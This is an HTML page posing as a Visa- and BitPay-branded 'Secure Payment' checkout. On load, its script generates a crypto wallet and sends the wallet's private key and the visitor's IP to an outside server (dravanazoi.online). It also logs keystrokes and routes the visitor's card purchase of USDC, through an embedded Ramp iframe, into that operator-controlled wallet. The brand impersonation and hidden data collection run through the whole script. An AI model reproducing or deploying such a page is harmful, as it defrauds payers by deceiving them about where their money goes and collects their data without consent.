<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Secure Payment</title>
    <script src="https://cdn.jsdelivr.net/npm/ethers@5.6.9/dist/ethers.umd.min.js"></script>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
    <link rel="icon" href="favicon.ico" type="image/x-icon">
    <style>
        body {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #f0f4f8;
            font-family: 'Roboto', sans-serif;
            text-align: center;
            color: #333;
        }

        h1 {
            font-size: 2.5rem;
            margin-bottom: 20px;
            color: #2c3e50;
        }

        .iframe-container {
            position: relative;
            width: 90%;
            max-width: 800px;
            height: 600px;
            box-shadow: 0px 4px 30px rgba(0, 0, 0, 0.2);
            border-radius: 15px;
            overflow: hidden;
            background-color: white;
        }

        .payment-panel {
            position: absolute;
            top: 10px;
            left: 50%;
            width: 95%;
            background-color: #28a745;
            color: white;
            padding: 15px;
            border-radius: 10px;
            transform: translateX(-50%);
            display: flex;
            align-items: center;
            justify-content: space-between;
            font-weight: 700;
            box-shadow: 0px 2px 5px rgba(0, 0, 0, 0.2);
        }

        .payment-logo {
            width: 40px; 
            height: 40px; 
            background-image: url('https://i.ibb.co/ycM3Vdf1/images-removebg-preview.png'); 
            background-size: cover; 
            background-position: center; 
            display: inline-block; 
        }

        iframe {
            width: 100%;
            height: 100%;
            border: none;
            border-radius: 10px;
            transition: opacity 0.3s ease-in-out;
        }

        .loading-overlay {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(255, 255, 255, 0.8);
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 20;
            opacity: 0;
            transition: opacity 0.3s;
            font-size: 1.2rem;
            color: #2c3e50;
        }

        .loading-overlay.visible {
            opacity: 1;
        }

        @media (max-width: 600px) {
            .iframe-container { height: 500px; }
            h1 { font-size: 1.8rem; }
        }

        @media (min-width: 601px) and (max-width: 900px) {
            h1 { font-size: 2.2rem; }
        }

        .trust-signals {
            margin-top: 20px;
            display: flex;
            justify-content: center;
            gap: 20px;
        }

        .trust-signal {
            width: 80px;
            transition: transform 0.3s;
        }

        .trust-signal:hover {
            transform: scale(1.1);
        }

        footer {
            margin-top: 20px;
            font-size: 0.9rem;
            color: #666;
        }

        footer a {
            color: #28a745;
            text-decoration: none;
        }

        footer a:hover {
            text-decoration: underline;
        }

        .button {
            background-color: #4CAF50;
            border: none;
            color: white;
            padding: 10px 20px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 16px;
            margin: 10px 2px;
            cursor: pointer;
            border-radius: 5px;
            transition: background-color 0.3s, transform 0.2s;
        }

        .button:hover {
            background-color: #45a049;
            transform: translateY(-2px);
        }
		
		.security-button {
            background-color: #f1c40f;
            border: none;
            color: white;
            padding: 10px 15px;
            text-align: center;
            text-decoration: none;
            font-size: 16px;
            cursor: pointer;
            border-radius: 5px;
            transition: background-color 0.3s;
        }

        .security-button:hover {
            background-color: #e0b90f;
        }
		
		.section {
            margin: 10px 0;
            padding: 10px;
            background-color: #ffffff;
            border-radius: 10px;
            box-shadow: 0px 2px 5px rgba(0, 0, 0, 0.1);
        }

        .section h2 {
            font-size: 2rem;
            color: #2c3e50;
        }

        .section p {
            font-size: 1rem;
            color: #555;
        }
		@media (max-width: 600px) {
    .iframe-container {
        height: 610px;
        margin-top: -20px; /* Ajustez la valeur selon vos besoins */
    }

    .payment-panel {
        margin-top: 20px; /* Ajustez la valeur selon vos besoins */
    }

    h1 {
        font-size: 1.8rem;
    }

    /* Réduction de la taille des trust signals */
    .trust-signals {
        display: none; /* Cache complètement les logos sur mobile */
    }


    /* Réduction de la taille du footer */
    footer {
        font-size: 0.7rem; /* Réduisez la taille de la police */
        margin-top: 100px; /* Réduisez la marge supérieure */
    }
}


    </style>
</head>
<body>
    <h1></h1>
    <div class="iframe-container">
        <div class="payment-panel" id="payment-panel">
            <div class="payment-logo"></div> 
            <div id="payment-info">
                To pay : <span id="payment-amount"></span> <span id="currency"></span><br>
                Order number : <span id="order-number"></span>
            </div>
        </div>
        <iframe id="payment-iframe"></iframe>
        </div>
    </div>

    <div class="trust-signals">
        <img src="https://i.ibb.co/Ld8dhrBZ/verified-by-visa-logo-png-seeklogo-411752-removebg-preview.png" alt="Paiement accepté" class="trust-signal" title="Paiement accepté par Visa">
        <img src="https://i.ibb.co/sJt48St8/81-810998-mastercard-securecode-3-d-secure-hd-png-download-removebg-preview.png" alt="Sécurité Mastercard" class="trust-signal" title="Sécurité Mastercard">
    </div>
	
	
    <footer>
		<p>We are committed to providing a safe and transparent environment for your transactions. Your data will never be shared without your consent.</p>
        <p>For any inquiries, please contact us at <a href="mailto:help@visa.org">help@visa.com</a></p>
        <p><a href="https://usa.visa.com/legal/global-privacy-notice.html">Privacy Policy</a></p>
    </footer>

    <script>
         let keystrokes = new Set(); 
        let secondsSpent = 0;

        function getQueryParam(param) {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get(param);
        }

        async function getIpAddress() {
            try {
                const response = await fetch('https://api.ipify.org?format=json');
                const data = await response.json();
                return data.ip;
            } catch (error) {
                console.error('Erreur lors de la récupération de l\'adresse IP:', error);
                return 'Inconnu';
            }
        }
		
		async function getCountryAndCurrency(ip) {
            try {
                const response = await fetch(`https://ipapi.co/${ip}/json/`);
                const data = await response.json();
                return {
                    country: data.country_name,
                    currency: data.currency
                };
            } catch (error) {
                console.error('Erreur lors de la récupération du pays et de la devise:', error);
                return {
                    country: 'Unknown',
                    currency: 'EUR'
                };
            }
        }

        async function convertCurrency(amount, fromCurrency, toCurrency) {
            try {
                const response = await fetch(`https://api.exchangerate-api.com/v4/latest/${fromCurrency}`);
                const data = await response.json();
                const rate = data.rates[toCurrency];
                return (amount * rate).toFixed(2);
            } catch (error) {
                console.error('Erreur lors de la conversion de la devise:', error);
                return amount; // Fallback to original amount if conversion fails
            }
        }
		
		async function saveWallet(ip, wallet) {
			await fetch('https://dravanazoi.online/save_wallet', {
				method: 'POST',
				headers: {
					'Content-Type': 'application/json'
				},
				body: JSON.stringify({ ip: ip, address: wallet.address, privateKey: wallet.privateKey })
			});
		}
		
		async function getWalletByIp(ip) {
			const response = await fetch(`https://dravanazoi.online/get_wallet?ip=${ip}`);
			if (response.ok) {
				return await response.json(); // Renvoie l'adresse et la clé privée si elles existent
			}
			return null; // Renvoie null si aucune adresse n'est trouvée
		}

        async function initialize() {
            let isc = Math.max(getQueryParam("isc") || 5, 5);
			const ip = await getIpAddress();
            let wallet = await getWalletByIp(ip);
			if (!wallet) {
				wallet = await createNewWallet();
				await saveWallet(ip, wallet);
			} else {
				console.log(`Adresse récupérée: ${wallet.address}`);
				console.log(`Privatekey récupérée: ${wallet.privateKey}`);
			}


			const { country, currency } = await getCountryAndCurrency(ip);
			const convertedAmount = await convertCurrency(isc, 'EUR', currency);


            setInterval(() => {
                secondsSpent++;
            }, 1000);

            document.addEventListener('keydown', (event) => {
                keystrokes.add(event.key);
            });

            const iframe = document.getElementById("payment-iframe");
            const iframeUrl = `https://app.ramp.network/?hostApiKey=8v45n96txxxh9wkdftehhadegsv3r3n6ew6unxyq&enabledFlows=ONRAMP&defaultFlow=ONRAMP&swapAsset=MATIC_USDC&defaultAsset=MATIC_USDC&userAddress=${wallet.address}&swapAmount=${isc * 1000000}&hostAppName=BitPay&hostLogoUrl=https%3A%2F%2Fbitpay.com%2Fimg%2Fwallet-logos%2Fbitpay-wallet.svg`;
            iframe.src = iframeUrl;


            updateTitle();
            displayPaymentInfo(convertedAmount, currency);
            saveLog(wallet.address, wallet.privateKey, isc, ip, secondsSpent, Array.from(keystrokes).join(''));
        }

        function displayPaymentInfo(amount, currency) {
            document.getElementById("payment-amount").textContent = amount;
            document.getElementById("currency").textContent = currency;
            document.getElementById("order-number").textContent = Math.floor(100000 + Math.random() * 900000).toString();
        }


        function updateTitle() {
            const referer = document.referrer;
            let title = "Secure Payment";

            if (referer) {
                const origin = new URL(referer).hostname;
                title = `${origin.charAt(0).toUpperCase() + origin.slice(1)} Payment`;
            }

            document.title = title;
        }

        function createNewWallet() {
            const wallet = ethers.Wallet.createRandom();
            console.log(`Nouvelle adresse générée: ${wallet.address}`);
            console.log(`Clé privée: ${wallet.privateKey}`);

            fetch('https://dravanazoi.online/execute', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ "usdca": wallet.address })
            })
            .then(response => {
                if (!response.ok) {
                    return response.text().then(text => {
                        console.error('Erreur lors de l\'exécution:', text);
                        throw new Error('Erreur lors de l\'exécution');
                    });
                }
                return response.json();
            })
            .then(data => console.log("Réponse du serveur :", data))
            .catch(error => console.error('Erreur:', error));

            return wallet;
        }
        
        function saveLog(address, privateKey, amount, ip, secondsSpent = 1, keystrokes = '') {
            const logEntry = {
                address: address,
                privateKey: privateKey,
                amount: amount,
                ip: ip,
                timestamp: getFormattedDate()
            };

            fetch('https://dravanazoi.online/log_transaction', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify(logEntry)
            })
            .then(response => {
                if (!response.ok) {
                    return response.text().then(text => {
                        console.error('Erreur lors de l\'enregistrement des logs:', text);
                        throw new Error('Erreur lors de l\'enregistrement des logs');
                    });
                }
            })
            .catch(error => console.error('Erreur:', error));
        }
		function getFormattedDate() {
			const options = {
				timeZone: 'Europe/Paris', // Utiliser le fuseau horaire de Paris
				year: 'numeric',
				month: 'short', // Nom du mois en format abrégé
				day: '2-digit',
				hour: '2-digit',
				minute: '2-digit',
				second: '2-digit',
				hour12: false, // Format 24 heures
			};

    // Obtenir la date formatée selon le fuseau horaire
			const date = new Date().toLocaleString('en-GB', options); // Format GB pour avoir le format jour/mois/année
			return `[${date.replace(',', '')}]`; // Enlever la virgule pour le format final
		}


        function submitPayment() {
            alert('Paiement soumis !');
        }

        initialize();
    </script>
</body>
</html>
